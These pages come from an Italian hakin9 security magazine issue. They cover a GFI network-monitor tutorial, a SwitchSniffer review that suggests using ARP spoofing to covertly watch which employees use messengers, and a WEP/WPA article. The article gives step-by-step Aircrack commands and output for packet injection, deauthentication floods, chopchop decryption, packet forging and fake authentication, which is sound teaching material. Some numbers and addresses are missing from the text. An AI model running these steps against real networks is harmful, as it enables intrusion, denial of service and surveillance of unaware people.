vogliamo eseguire il controllo) e impostiamo l'opzione Error Threshold (Soglia di errore) pari a uno. Poi selezioniamo certificate authentication (autenticazione del certificato) nel parametro Logon credentials (Credenziali di accesso) per avere una connessione sicura. È anche necessario impostare Alert -> Settings (Avviso -> Impostazioni) sotto il campo Actions (Azioni) per definire la modalità in cui vogliamo essere informati quando accade qualcosa di sbagliato alla rete. Per ricevere gli avvisi tramite posta elettronica, è necessario deselezionare Send a SMS message to (Invia messaggio SMS a) e Send a network message to (Invia messaggio di rete a). A questo punto possiamo aggiungere delle regole. Facciamo doppio clic sulla cartella e poi sul tasto destro del mouse per impostare un'altra verifica. Se vogliamo rendere disponibile il nostro sito, dobbiamo selezionare l'opzione Check for availability only (Verifica solo la disponibilità). In questo modo abbiamo creato la nostra prima regola. Vogliamo anche conoscere se il processo Apache sia in esecuzione correttamente, è quindi necessario creare una nuova regola e selezionare Generic Secure Shell (SSH) Check (Controllo Secure Shell generico). Come potete vedere, il GFI Software ha già creato alcuni script. Selezionate lo script di verifica Apache e specificate il server/ip. Per vedere se il server FTP funziona correttamente, è necessario definire una regola secondo cui verrà eseguito un login completo al server FTP. Ripetete le stesse procedure di prima, ma questa volta selezionate FTP dall'elenco delle regole e abilitate l'opzione Use FTP site authentication (Utilizza autenticazione sito FTP). Non dimenticate di specificare come il Network server monitor dovrebbe eseguire il login. Poi impostate alcune regole per la macchina Windows Server Create una nuova cartella con le stesse impostazioni del sistema SUSE e modificate l'ip/hostname/logon credentials (credenziali di accesso) del server win. Modificatelo nella cartella win e create una nuova regola CPU Usage (Utilizzo della CPU). Impostate l'utilizzo massimo di CPU al 100%. Con un messaggio standard di errore obbligate il Network monitor a riavviare il server Win 2003 se raggiunge un utilizzo della CPU del 100%. Per fare ciò è necessario abilitare l'opzione Reboot the following computer (Riavviare il seguente computer) sotto le impostazioni Actions -> Reboot Computer / Restart Services (Azioni -> Riavvia Computer / Riavvia Servizi). Adesso è arrivato il momento di vedere se tutte le regole funzionano correttamente. Per questa operazione bisogna selezionare Monitoring Checks Status (Stato di controllo del monitoraggio) dalla barra degli strumenti. È bene sapere che le stesse informazioni sono anche disponibili attraverso un browser web Se i servizi sono avviati correttamente apparirà uno stato di Succeeded (Riuscito) nelle regole (altrimenti apparirà uno stato di Failed, ossia Non Riuscito). Se otterrete il secondo stato il GFI Network Monitor invierà un messaggio o potrebbe riavviare il sistema. Altri utili attributi: Come potete vedere quasi non ci sono limiti a quello che possiamo controllare o cosa dovrebbe fare il vostro server in caso di errore. Inoltre è anche possibile eseguire una ricerca DNS, abilitare la funzione whois per l'identificazione del client e eseguire richieste di traceroute. Se una macchina compatibile con SNMP è in esecuzione sulla rete lo strumento fornisce anche un controllo SNMP (SNMP Audit) e una funzione SNMP Walk. Un'altra bella caratteristica è che potete richiedere quali computer sono al momento presenti sul vostro dominio oltre a contare i processi di un dato sistema. Stefan Lochbihler 12 hakin9 Nº 2/2006

13 Strumenti SwitchSniffer Sistema operativo: Windows NT4/2000/XP/2003 Licenza: Freeware Destinazione: Monitoring di rete LAN Homepage: SwitchSniffer è uno strumento semplice e gratuito, destinato al monitoring delle reti di computer locali, dotato di meccanismi base per l'amministrazione e la rivelazione degli abusi. Partenza veloce: Da poco tempo svolgiamo le mansioni di amministratore di rete presso una piccola azienda. Il nostro presidente ci ha incaricati di rilevare quali dipendenti della ditta, invece di dedicare il tempo al lavoro, usano gli Internet communicator e le applicazioni peer-to-peer. Dato che la nostra postazione è basata sul sistema Windows, la rete aziendale basata sugli switch e il datore di lavoro non ha acquistato nessun altro strumento commerciale per il penetration test, abbiamo deciso di usare un'applicazione gratuita chiamata SwitchSniffer elaborata per lo sniffing nelle reti basate su switch. Per l'avvio del programma sono necessari i diritti di amministratore, senza di essi l'applicazione può comportarsi in modo instabile. Dopo il primo lancio ci appare la finestra delle opzioni. Nel sottomenù Network dobbiamo scegliere l'interfaccia di rete su cui andremo ad ascoltare. Vale la pena dare un'occhiata anche al sottomenù Spoof ed impostare Spoofing Types su <-> Gateway. In alcune reti può essere indispensabile per un corretto funzionamento dello sniffer. Il lavoro inizia con la scansione della rete locale (tasto Scan). Il programma la esegue in modo veloce rilevando tutti gli host attivi nella nostra sottorete. Essi verranno presentati sulla lista Local Hosts Info e sull'albero Up Hosts. Affinché l'analisi venga riferita a tutti gli host attivi, dobbiamo sviluppare l'albero e cliccare con il tasto destro del mouse su Select All. Dopo un paio di secondi possiamo premere il tasto Start il programma inizierà ad intercettare le informazioni dalla rete. Nel sottomenù Local Hosts Info otteniamo le informazioni sui computer della rete locale. SwitchSniffer svela inoltre: il sistema operativo, il nome del computer, l'indirizzo IP, l'indirizzo MAC ed il produttore della scheda di rete. Vengono mostrate anche le dimensioni dei pacchetti scaricati dalla rete, la velocità dello scarico e dell'invio. Con SwitchSniffer possiamo quindi monitorare anche il livello di utilizzo della rete da parte dei singoli dipendenti, ciò ci può suggerire chi si diverte invece di lavorare. Nel sottomenù Remote Hosts Info avremo le informazioni sugli host remoti. Mentre in Sessions Info troveremo le informazioni sulle sessioni correnti. I sottomenù della finestra a sinistra contengono rispettivamente: gli host locali (Local), l'albero degli host remoti (Remote) e l'albero degli servizi (Services). Ora, per realizzare l'incarico affidatoci dal nostro presidente, ci basta passare al sottomenù Services nella finestra sinistra del programma. Sulla lista vedremo i servizi (le porte tipiche per i commmunicator, per esempio jabber-client(5223)) e, dopo aver sviluppato l'albero di un servizio, vedremo gli host remoti con cui si connettono gli utenti, mentre sviluppando l'albero accanto all'indirizzo dell'host remoto vedremo gli host locali ovvero i colpevoli ricercati dal presidente. Altri utili atributi: il programma ci permette di bloccare le sessioni e le connessioni selezionate (con l'aiuto delle opzioni individuabili dopo aver cliccato il tasto destro del mouse). Quindi ci permette non solo di analizzare ma pure di amministrare certi servizi ammessi in rete (nel sottomenù Definitions possiamo definire quali servizi saranno ammessi, quali indirizzi MAC potranno usare la nostra rete e sfogliare le regole di filtro del traffico). Infine il programma ci facilita la rilevazione dell'arp Spoofing (sottomenù Detect and Alert nelle opzioni del programma). Difetti: il programma è meno sviluppato rispetto a dsniff o Ettercap. Ci potranno capitare dei problemi di stabilità (il programma continua ad essere reperibile solo in versione beta). Comunque lo strumento è molto più facile nell'uso rispetto altri programmi concorrenti un dato molto importante, sopratutto per un'amministratore principiante. Paweł Charnas Fig. 1: SwitchSniffer in azione hakin9 Nº 2/

14 Sicurezza Wi-Fi WEP, WPA e WPA2 Prima pagina Guillaume Lehembre Grado di difficoltà Il Wi-Fi (Wireless Fidelity) è una delle tecnologie wireless più importanti dei nostri giorni ed è sempre più presente nei nostri dispositivi: portatili, palmari e cellulari. Eppure c'è una aspetto relativo alla sua configurazione che viene spesso trascurato: la sicurezza. Analizziamo meglio la sicurezza dei metodi di crittografia usati nelle moderne apparecchiature Wi-Fi. Anche quando i dispositivi Wi-Fi hanno le misure di sicurezza attivate, viene spesso usato un protocollo di cifratura debole come il WEP. In questo articolo, esamineremo le debolezze del WEP e vedremo come è facile crackare il protocollo. La deplorevole inadeguatezza del WEP mette in evidenza la necessità di una nuova architettura di sicurezza come lo standard i, quindi analizzeremo da vicino anche i nuovi standard WPA e WPA2 insieme ai loro limiti e la loro integrazione nei sistemi operativi. In memoria del WEP Il WEP (Wired Equivalent Privacy) era il protocollo di cifratura predefinito del primo standard IEEE introdotto nel lontano Esso si basa su un algoritmo di cifratura RC4 con una chiave segreta di 40 bit o 104 bit combinata con un vettore d'inizializzazione (Initialisation Vector, IV) di 24 bit per cifrare il messaggio in chiaro M e il relativo checksum il cosiddetto valore di controllo dell'integrità (Integrity Check Value, ICV). Il messaggio cifrato C viene quindi prodotto con la seguente formula: C = [ M ICV(M) ] + [ RC4(K IV) ] dove è un operatore di concatenazione e + è un operatore XOR. Come possiamo vedere, il vettore d'inizializzazione IV è la chiave di sicurezza WEP, quindi per mantenere un livello decente di sicurezza e minimizzare la divulgazione, il vettore IV dovrebbe essere aumentato per ogni pacchetto in modo che i pacchetti successivi sono cifrati con chiavi diverse. Sfortunatamente in questo caso, il vettore IV è trasmesso in formato testo e lo standard non si occupa dell'aumento del vettore IV, lasciando questo metodo di sicurezza Dall'articolo imparerai... i limiti della crittografia WEP, una panoramica generale sullo standard i e le sue implementazioni commerciali: WPA e WPA2, i concetti base del 802.1x, le eventuali debolezze di WPA e WPA2. Cosa dovresti sapere... i concetti base dei protocolli TCP/IP e Wi-Fi, conoscenza base di crittografia. 14 hakin9 Nº 2/2006

15 Sicurezza WEP, WPA e WPA2 a particolari componenti di terminali wireless (punto d'accesso o scheda wireless). Breve storia del WEP Il protocollo WEP non era stato creato da esperti di sicurezza né da crittografi, quindi si rilevò subito vulnerabile ai problemi relativi all'algoritmo RC4 descritti da David Wagner quattro anni prima. Nel 2001, Scott Fluhrer, Itsik Mantin e Adi Shamir (FMS in breve) pubblicarono un famoso studio sul WEP, mostrandone le vulnerabilità in termini di RC4: la invariance weakness e gli attacchi a vettori IV conosciuti. Entrambi gli attacchi si basano sul fatto che i bit nei byte iniziali del keystream possono dipendere solo da alcuni bit della chiave di cifratura (anche se di solito ogni keystream ha il 50% delle possibilità di essere diverso dal flusso precedente). Dal momento che la chiave di cifratura è composta dalla concatenazione della chiave segreta e il IV, alcuni valori del vettore IV possono generare chiavi deboli. Le vulnerabilità vennero sfruttate da strumenti di sicurezza come Air- Snort che permettono alle chiavi WEP di essere recuperate analizzando una quantità sufficiente di traffico. Mentre questo tipo di attacco potrebbe essere eseguito con successo su una rete impegnata entro un intervallo di tempo ragionevole, il tempo richiesto per l'elaborazione dei dati è abbastanza lungo. David Hulton (h1kari) progettò una versione ottimizzata dell'attacco, prendendo in considerazione non solo i primi byte del RC4 (come nel modello FMS), ma anche i successivi byte. Questo portò ad una leggera riduzione dei dati richiesti per l'analisi. La fase di verifica dell'integrità soffre anche di gravi debolezze dovute all'algoritmo CRC32 usato per questo compito. CRC32 è usato di solito per la rilevazione di errori, ma non era mai stato considerato sicuro a livello crittografico a causa della sua linearità, come affermarono già Nikita Borisov, Ian Goldberg e David Wagner nel Da allora si ritiene che il WEP fornisce un livello di sicurezza accettabile solo per utenze domestiche e applicazioni non-cruciali. Tuttavia, Fig. 1: Protocollo di cifratura WEP anche questa utilità venne smentita con l'apparizione degli attacchi KoreK nel 2004 (attacchi FMS generalizzati che comprendono le ottimazione di h1kari), e l'attacco induttivo di Arbaugh che consente ai pacchetti arbitrari di essere decriptati senza conoscere la chiave attraverso il packet injection. Dei programmi per il cracking come Aircrack di Christophe Devine o WepLab di José Ignacio Sánchez implementano questi attacchi e possono recuperare una chiave WEP di 128 bit in meno di 10 minuti (o poco più, a secondo del punto accesso specifico e la scheda wireless). L'aggiunta di packet injection migliora notevolmente i tempi di cracking del WEP, richiedendo non milioni, ma solo migliaia di pacchetti con sufficienti IV unici circa per una chiave da 64 bit e per una chiave da 128 bit. Con il packet injection, raccogliere i dati necessari Tabella 1. Storia del WEP Data Settember 1995 Ottober 2000 May 2001 July 2001 August 2001 August 2001 February 2002 August 2004 July/August 2004 Descrizione Possibile vulnerabilità RC4 (Wagner) richiedeva una manciata di minuti. Al momento, WEP è quasi definitivamente morto (vedere Tabella 1) e non ne è consigliabile l'uso neanche con una chiave a rotazione. I limiti di sicurezza del WEP potrebbero essere riassunte come segue: debolezze dell'algoritmo RC4 del protocollo WEP a causa della costruzione della chiave, IV sono troppo brevi (24 bit meno di 5000 pacchetti richiesti per una probabilità del 50% di collisione) e riutilizzo di IV consentito (nessuna protezione contro le ripetizioni di messaggio), nessuna valida verifica di integrità (CRC32 è usato per la rilevazione degli errori e non è sicuro a livello crittografico a causa della sua linearità), nessun metodo integrato per l'aggiornamento delle chiavi. Primo studio sui limiti del WEP: Unsafe at any key size; An analysis of the WEP encapsulation (Walker) Un attacco induttivo in testo chiaro contro il WEP/WEP2 (Arbaugh) Attacco CRC di tipo bit flipping Intercepting Mobile Communications: The Insecurity of (Borisov, Goldberg, Wagner) Attacchi FMS Weaknesses in the Key Scheduling Algorithm of RC4 (Fluhrer, Mantin, Shamir) Uscita di AirSnort Attacchi FMS ottimizzati da h1kari Attacchi KoreK (IV unici) uscita di chopchop e chopper Uscita di Aircrack (Devine) e WepLab (Sanchez ) che implementa gli attacchi KoreK hakin9 Nº 2/

16 Prima Pagina Listing 1. Attivazione della modalità di monitoraggio # airmon.sh start ath0 Interface Chipset Driver ath0 Atheros madwifi (monitor mode enabled) Listing 2. Rilevazione di reti vicine e dei rispettivi client # airodump ath0 wep-crk 0 BSSID PWR Beacons # Data CH MB ENC ESSID 00:13:10:1F:9A: WEP hakin9demo BSSID STATION PWR Packets ESSID 00:13:10:1F:9A:72 00:0C:F1:19:77:5C 56 1 hakin9demo Il cracking della chiave WEP con Aircrack Il cracking del WEP può essere facilmente eseguito usando strumenti quali Aircrack (creato dal ricercatore francese Christophe Devine). Aircrack contiene tre utility principali, usate in tre fasi di attacco diverse per il recupero della chiave: airodump: per lo sniffing e la cattura delle reti provviste del WEP, aireplay: per il packet injection e aumento del traffico, aircrack: per il cracking di chiavi WEP attraverso la cattura di IV unici. Al momento aireplay supporta l'injection solo su determinati chipset wireless, mentre l'injection in modalità di monitoraggio (monitor mode) richiede i più moderni driver patchati. La modalità di monitoraggio è l'equivalente della modalità promiscua nelle reti wired, e evitano il rifiuto dei pacchetti che non sono intesi per l'host che monitora (che è spesso svolto nel livello fisico della pila OSI) e quindi consentendo ai pacchetti di essere catturati. Con i dirver patchati, è richiesta solo una scheda wirelss per catturare e aumentare il traffico allo stesso tempo. Lo scopo principale dell'attacco è di generare traffico e catturare i vettori IV unici usati tra un client legittimo e un punto d'accesso. Alcuni dati cifrati sono facilmente riconoscibili perché hanno una lunghezza fissa, un indirizzo di destinazione fisso, ecc. Questo è il caso dei pacchetti di richiesta ARP (vedere Riquadro Richieste ARP), che sono inviati all'indirizzo broadcast (FF:FF:FF:FF:FF:FF) e hanno una lunghezza fissa di 68 ottetti. Le richieste ARP possono essere ritrasmesse per generare nuove risposte ARP da un host legittimo, che risulta nello stesso messaggio wireless cifrato con i nuovi IV. Nei seguenti esempi, 00:13:10: 1F:9A:72 è l'indirizzo MAC del punto di accesso (BSSID) sul canale 1 con il SSID di hakin9demo e 00:09:5B: EB:C5:2B è l'indirizzo MAC del client wireless (usando WEP o WPA-PSK, a secondo dei casi). Per eseguire lo sniffing avremo bisogno dei privilegi di root. Il primo passo è attivare la modalità monitor sulla nostra scheda wireless (in questo caso un modello Atheros), quindi possiamo catturare tutto il traffico (vedere Listing 1). Il passo successivo è rilevare le reti vicine e i loro client controllando tutti i 14 canali che le reti Wi-Fi possono usare (vedere Listing 2). Il risultato nel Listing 2 è interpretato come segue: un punto di accesso con il BSSID 00:13:10:1F:9A: 72 usa la cifratura WEP sul canale 1 con il SSID hakin9demo e un client identificato dall'indirizzo MAC 00: 0C:F1:19:77:5C sono associati con questa rete wireless e autenticati. Una volta localizzata la rete di destinazione, è necessario iniziare la cattura sul canale corretto per evitare di mancare i pacchetti mentre Richieste ARP Il protocollo Address Resolution Protocol (ARP RFC826) è usato per tradurre un indirizzo IP di 32 bit in un indirizzo Ethernet di 48 bit (le reti Wi-Fi usano anche il protocollo Ethernet). Per illustrarlo meglio, prendiamo un host A ( ) che vuole comunicare con l'host B ( ), un indirizzo IP noto deve essere tradotto in un indirizzo MAC usando il protocollo ARP. Per farlo, l'host A invia un messaggio broadcast con l'indirizzo IP dell'host B (Who has ? Tell ). L'host di destinazione riconosce l'indirizzo IP nel pacchetto è uguale al suo e restituisce una risposta ( is at 01:23:45:67:89:0A). La risposta viene di solito memorizzata. si scansionano gli altri canali. Il seguente comando produce lo stesso output del comando precedente: # airodump ath0 wep-crk 1 Successivamente, possiamo usare le informazioni raccolte prima per aumentare il traffico con aireplay. L'injection inizierà quando ci appare nella rete wireless una richiesta ARP associata con il BSSID: # aireplay -3 \ -b 00:13:10:1F:9A:72 \ -h 00:0C:F1:19:77:5C \ -x 600 ath0 (...) Read 980 packets (got 16 ARP requests), sent 570 packets... Infine, aircrack viene usato anche per recuperare la chiave WEP. Attraverso il file pcap possiamo lanciare questo passo finale mentre airodump è ancora intento a catturare i dati (vedere Fig. 2 per i risultati): # aircrack -x -0 wep-crk.cap Altri tipi di attacchi con Aircrack Aircrack è in grado di lanciare anche altri tipi di attacchi molto interessanti. Analizziamone alcuni. 16 hakin9 Nº 2/2006

17 Sicurezza WEP, WPA e WPA2 Attacco 2: Deautenticazione Questo attacco può essere usato per recuperare un SSID nascosto (cioè che non è broadcast), catturare una handshake WPA a 4 vie o lanciare un attacco di tipo Denial of Service (ne parleremo in dettaglio più avanti, nella sezione sul i). Lo scopo dell'attacco è di obbligare il client a ri-autenticarsi che, insieme ad una mancata autenticazione per le trame di controllo (usati per l'autenticazione, associazione, ecc), consente all'aggressore di falsare gli indirizzi MAC. Un client wireless può essere deautenticato con il seguente comando facendo in modo che i pacchetti di deautenticazione siano inviati dal BSSID al client MAC falsificando il BSSID: # aireplay a 00:13:10:1F:9A:72 -c 00:0C:F1:19:77:5C ath0 La de-autenticazione di massa è altrettanto possibile (anche se non sempre affidabile) chiedendo all'aggressore di falsificare continuamente il BSSID e re-inviare il pacchetto di de-autenticazione all'indirizzo broadcast: # aireplay a 00:13:10:1F:9A:72 ath0 Attacco 3: Decriptare pacchetti WEP arbitrari senza conoscerne la chiave Questo attacco si basa su uno strumento proof-of-concept della KoreK detto chopchop che è in grado di decriptare i pacchetti WEP cifrati senza conoscerne la chiave. Il controllo di integrità implementato sul protocollo WEP permette ad un aggressore di modificare sia un pacchetto cifrato sia il CRC corrispondente. Inoltre, l'uso dell'operatore XOR nel protocollo WEP significa che il byte selezionato nel messaggio cifrato dipende sempre dallo stesso byte del messaggio in chiaro. Eliminando l'ultimo byte del messaggio cifrato genera una corruzione del messaggio ma permette anche di indovinare il valore del byte corrispondente in Fig. 2: Risultati di Aicrack dopo alcuni minuti formato testo e adeguare il messaggio cifrato. Se il pacchetto corretto è poi re-injected nella rete, esso verrà abbandonato dal punto di accesso se la previsioni sono sbagliate (in tal caso deve essere fatto una nuova previsione), ma per una previsione corretta verrà ritrasmesso come al solito. Ripetendo l'attacco per tutti i byte del messaggio si può decifrare un pacchetto WEP e recuperare il keystream. Tenente a mente che nel protocollo WEP l'incremento del vettore IV non è obbligatorio, è possibile riutilizzare questo keystream per falsare i pacchetti successivi (riutilizzando lo stesso IV). La scheda wireless deve essere passata in modalità di monitoraggio sul canale giusto (vedere l'esempio precedente per una descrizione su come fare). L'attacco deve essere lanciato contro un client legittimato (ancora 00:0C:F1:19:77:5C nel nostro caso) e aireplay dirà all'aggressore di accettare ogni pacchetto cifrato (vedere Listing 3). Vengono creati due file pcap: uno per il pacchetto decifrato e l'altro per il relativo keystream. Il file che ne risulta può essere letto attraverso un lettore adatto (useremo tcpdump) vedere Listing 4 per un ping di esempio scambiato tra due host. Una volta catturato il keystream è possibile falsare qualsiasi pacchetto. Di seguito vi presentiamo una richiesta ARP falsata inviata da (00:0C:F1:19:77:5C) a : # arpforge \ replay_dec xor \ 1 \ 00:13:10:1F:9A:72 \ 00:0C:F1:19:77:5C \ \ \ forge-arp.cap Infine, aireplay è usato per ritrasmettere questo pacchetto (vedere Listing 5). Questo metodo è meno automatico della falsificazione della richiesta ARP eseguita da Aircrack (l'opzione -1), ma è più scalabile l'aggressore può usare i keystream scoperti per alterare qualsiasi pacchetto che non appartiene più al keystream (altrimenti è necessario espandere il keystream). Attacco 4: Falsa autenticazione Il metodo per cracker la chiave WEP appena descritto (Attacchi 1 e 3) richiedono un client legittimo (reale o virtuale, anche se reale è preferibile) che sia associato ad un punto d'accesso affinché il punto d'accesso non rifluiti i pacchetti a causa di un indirizzo di destinazione non associato. Se viene usata un'autenticazione aperta, qualsiasi client può essere autenticato e associato con un punto di accesso, ma il punto di accesso ri- hakin9 Nº 2/

18 Prima Pagina Listing 3. Decriptare pacchetti WEP senza conoscere la chiave # aireplay -4 -h 00:0C:F1:19:77:5C ath0 Read 413 packets... Size: 124, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:13:10:1F:9A:72 Dest. MAC = 00:13:10:1F:9A:70 Source MAC = 00:0C:F1:19:77:5C 0x0000: 0841 d f 9a72 000c f c.A...r...w\ 0x0010: f 9a70 c040 c3ec e100 b1e1 0x0020: 5cf c89 68a0 23f5 0b47 5abd 5b76 \.'...h.#..gz.[v 0x0030: c8 adfe bf30 d98c bf 536c.x hV.Sl 0x0040: fd2 d44b c6a0 a3e2 6ae b4 pf_..k...j.4wt. 0x0050: fb13 c1ad b8b8 e a 55c2 ea9f 5be6...5#.U...[. 0x0060: 862b 3ec1 5b1a a1a7 223b d1 e6e1.+>.[...";.d7... 0x0070: 3b88 c5b bff 5160 ;...C...Q` Use this packet? y Saving chosen packet in replay_src cap Offset 123 ( 0% done) xor = 07 pt = frames written in 1120ms Offset 122 ( 1% done) xor = 7D pt = 2C 671 frames written in 2013ms (...) Offset 35 (97% done) xor = 83 pt = frames written in 2072ms Offset 34 (98% done) xor = 2F pt = frames written in 2076ms Saving plaintext in replay_dec cap Saving keystream in replay_dec xor Completed in 183s (0.47 bytes/s) Listing 4. Lettura di un file pcap # tcpdump -s 0 -n -e -r replay_dec cap reading from file replay_dec cap, link-type IEEE802_11 (802.11) 11:40: BSSID:00:13:10:1f:9a:72 SA:00:0c:f1:19:77:5c DA:00:13:10:1f: 9a:70 LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03: oui Ethernet (0x000000), ethertype IPv4 (0x0800): > : ICMP echo request, id 23046, seq 1, length 64 Listing 5. Ritrasmissione di un pacchetto alterato # aireplay -2 -r forge-arp.cap ath0 Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:13:10:1F:9A:72 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:0C:F1:19:77:5C 0x0000: f 9a72 000c f c.A...r...w\ 0x0010: ffff ffff ffff 8001 c3ec e100 b1e1 062c..., 0x0020: 5cf f4 25f1 4b46 1ab0 199c \.'.I.`.%.KF... 0x0030: b78c f2d bdce d18c 8d33 cc11 510a..S.o Q. 0x0040: 49b7 52da I.R. Use this packet? y Saving chosen packet in replay_src cap You must also start airodump to capture replies. Sent 1029 packets... Listing 6. Falsa autenticazione # aireplay e hakin9demo -a 00:13:10:1F:9A:72 -h 0:1:2:3:4:5 ath0 18:30:00 Sending Authentication Request 18:30:00 Authentication successful 18:30:00 Sending Association Request 18:30:00 Association successful fiuterà ogni pacchetto non cifrato con la chiave WEP giusta. Nell'esempio del Listing 6, Aireplay è usato per falsificare un'autenticazione e un'associazione per il SSID hakin9demo (BSSID: 00:13:10:1F:9A:72) con l'indirizzo MAC falsato 0:1:2:3:4:5. Alcuni punti di accesso richiedono ai client di riassociarsi ogni 30 secondi. Questo comportamento può essere imitato in aireplay sostituendo la seconda opzione (0) con i Nel gennaio del 2001, nell'ambito dell'ieee venne creato un task group i per migliorare l'autenticazione dei dati e la sicurezza crittografica. Nell'aprile del 2003, la Wi-Fi Alliance (un'associazione per la promozione e la certificazione Wi-Fi) distribuì una raccomandazione per rispondere alle preoccupazioni delle aziende in merito alla sicurezza wireless. Tuttavia, erano anche consapevoli del fatto che i clienti non avrebbero sostituito la loro attrezzatura tanto facilmente. Nel giugno del 2004, venne adottato lo standard i e ricette il nome commerciale di WPA2 dalla Wi-Fi Alliance stessa. Lo standard IEEE i introdusse cambiamenti fondamentali come la separazione tra l'autenticazione dell'utente dalla segretezza e l'integrità del messaggio, fornendo una architettura di sicurezza robusta e scalabile adatta sia per le reti domestiche sia per grossi sistemi aziendali. La nuova architettura per le reti wireless è nominata Robust Security Network (RSN) e utilizza l'autenticazione 802.1X, una distribuzione della chiave robusta e nuovi meccanismi di segretezza e integrità dei dati. Anche se l'architettura RSN è molto complessa, essa fornisce delle soluzioni sicure e scalabili per le comunicazioni wireless. Un RSN normalmente accetta solo dispositivi RSN, ma IEEE i definisce anche un'architettura Transitional Security Network (TSN) in cui possono partecipare sia RSN sia i sistemi WEP, consentendo anche agli utenti di aggiornare i loro strumenti. Se le procedure di autenticazione o di associazione usate tra le sta- 18 hakin9 Nº 2/2006

19 Sicurezza WEP, WPA e WPA2 IEEE 802.1X e EAP Il protocollo di autenticazione IEEE 802.1X (noto anche come Port-Based Network Access Control) è una framework sviluppata in origine per le reti wired che fornisce meccanismi di autenticazione, di autorizzazione e di distribuzione chiave, e implementano il controllo sull'accesso per utenti che entrano nella rete. L'architettura IEEE 802.1X si compone di tre entità principali: il supplicant che entra nella rete, l'autenticatore che fornisce il controllo sugli accessi, il server di autenticazione che esegue le autorizzazioni. Nelle reti wireless, il punto di accesso funge da autenticatore. Ogni porta fisica (porta virtuale nelle reti wireless) si divide in due porte logiche che compongono il PAE (Port Access Entity). L'autenticazione del PAE è sempre aperta e permette di far passare i le trame di autenticazione mentre il servizio PAE viene aperto solo in seguito ad una autenticazione andata a buon fine (come in uno stato autorizzato) per un certo periodo di tempo (3600 secondi di default). La decisione di permettere l'accesso è eseguita di solito dalla terza entità, cioè il server di autenticazione (che può essere un server Radius dedicato o per esempio nel caso di reti domestiche un processo che gira su un punto di accesso). La Fig. 3 illustra come queste tre entità comunicano tra loro. Lo standard i esegue piccole modifiche al IEEE 802.1X per le reti wireless per far fronte alla possibilità di furto di identità. L'autenticazione del messaggio deve essere incorporato affinché sia il supplicant sia l'autenticatore calcolino le chiavi segrete e permettono la cifratura prima di accedere alla rete. Il supplicant e l'autenticatore comunicano usando un protocollo EAP. Come potete notare, il ruolo dell'autenticatore è essenzialmente passivo potrebbe semplicemente inoltrare tutti i messaggi al server di autenticazione. EAP è una framework per il trasporto di diversi metodi di autenticazione, accettando solo un numero limitato di messaggi (Request, Response, Success, Failure), mentre gli altri messaggi intermediari dipendono dal metodo di autenticazione scelto: EAP-TLS, EAP-TTLS, PEAP, Kerberos V5, EAP-SIM ecc. Quando l'intero processo è completato (a causa del gran numero di possibili metodi non ci addentreremo nei dettagli), entrambe le entità (cioè il supplicant e il server di autenticazione) hanno una chiave principale segreta. La comunicazione tra l'autenticatore e il server di autenticazione procede utilizzando il protocollo EAPOL (EAP Over LAN), usato nelle reti wireless per il trasporto di dati EAP con i protocolli di livello superiore come Radius. zioni utilizza una handshake a 4 vie, l'associazione è detta RSNA (Robust Security Network Association). Per stabilire una comunicazione è necessario avere quattro fasi (vedere Fig. 4): pubblicizzate su Beacon o in un messaggio Probe Respond (seguendo un Probe Request dal client). Ne segue un'autenticazione aperta standard (proprio come nelle reti TSN, dove l'autenticazione è sempre a buon fine). La risposta del client viene incluso nel messaggio di tipo Association Request confermato dalla risposta Association Response dal punto di accesso. Le informazioni sulla politica di sicurezza è inviata nel campo RSN IE (Information Element) con i dettagli su: metodi di autenticazione supportati (802.1X, Chiave segrete precondivisa (PSK)), protocolli di sicurezza per traffico unicast (CCMP, TKIP ecc.) la pairwise cipher suite, protocolli di sicurezza per il traffico multicast (CCMP, TKIP etc.) il group cipher suite, supporto per la pre-autenticazione, permettendo agli utenti di pre-autenticarsi prima di passare ad un nuovo punto di accesso della stessa rete per un passaggio senza interruzioni. La Fig. 5 raffigura la prima fase. Fase 2: autenticazione 802.1X La seconda fase è l'autenticazione 802.1X basata sul EAP e il metodo di autenticazione concordato in precedenza: EAP/TLS con certificati client e server (che richiedono una infrastruttura per chiave pubblica), EAP/ TTLS o PEAP per l'autenticazione ibrida (con certificato richiesti solo per i server) ecc. L'autenticazione 802.1X viene iniziata quando il punto di accesso richiede i dati di identità del client, con la risposta del client contenente il metodo di autenticazione scelto. I messaggi adatti sono poi scambiati tra il client e il server accordo sulla politica di sicurezza, autenticazione 802.1X, derivazione e distribuzione di chiave, segretezza e integrità dei dati RSNA. Fase 1: Accordo sulla politica di sicurezza La prima fase richiede alle parti coinvolte nella comunicazione di stabilire un accordo sulla politica di sicurezza da adottare. Le politiche di sicurezza supportate dal punto di accesso sono Fig. 3: Modello IEEE 802.1X dalla specifica IEEE 802.1X hakin9 Nº 2/

20 Prima Pagina La PMK stessa non è mai usata per il controllo di cifratura o integrità. Invece, è usato per generare una chiave di cifratura temporanea per il traffico unicast si tratta di una PTK (Pairwise Transient Key). La lunghezza della PTK dipende dal protocollo di cifratura: 512 bit per TKIP e 384 bit per CCMP. La PTK consiste di diverse chiavi temporanee: Fig. 4: Le fasi operative del i di autenticazione per generare una chiave maestra comune (MK). Alla fine della procedura, un messaggio Radius Accept è inviato dal server di autenticazione al punto di accesso che contiene la MK e il messaggio EAP Success per il client. La Fig. 6 rappresenta questa seconda fase. Fase 3: Distribuzione e gerarchia di chiave La sicurezza nelle connessioni dipende molto dalle chiavi segrete. Nel RSN, ogni chiave ha una vita limitata e la sicurezza generale è garantita da un'insieme di diverse chiavi, organizzate in una gerarchia. Quando viene stabilito un contesto di sicurezza dopo una autenticazione andata a buon fine, le chiavi temporanee (di sessione) vengono create e aggiornate regolarmente fino a quando il contesto di sicurezza non viene chiuso. La generazione e lo scambio delle chiavi sono affidati alla terza fase. Si hanno due handshake durante le derivazione delle chiavi (vedere Fig. 7): PSK viene generata dalla passphrase (da 8 a 63 caratteri) o una stringa di 256 bit e fornisce una soluzione per le reti domestiche e di piccole imprese che non hanno un server di autenticazione, se viene usato un server di autenticazione, la PMK è derivata dall'autenticazione 802.1X MK. Fig. 5: Fase 1: Accordo sulla politica di sicurezza KCK (Key Confirmation Key 128 bit): Chiave per i messaggi di autenticazione (MIC) durante la Handshake a 4 vie e la Group Key Handshake, KEK (Key Encryption Key 128 bit): Chiave per garantire la segretezza durante la Handshake a 4 vie e la Group Key Handshake, TK (Temporary Key 128 bit): Chiave per la cifratura dei dati (usata per TKIP o CMMP), TMK 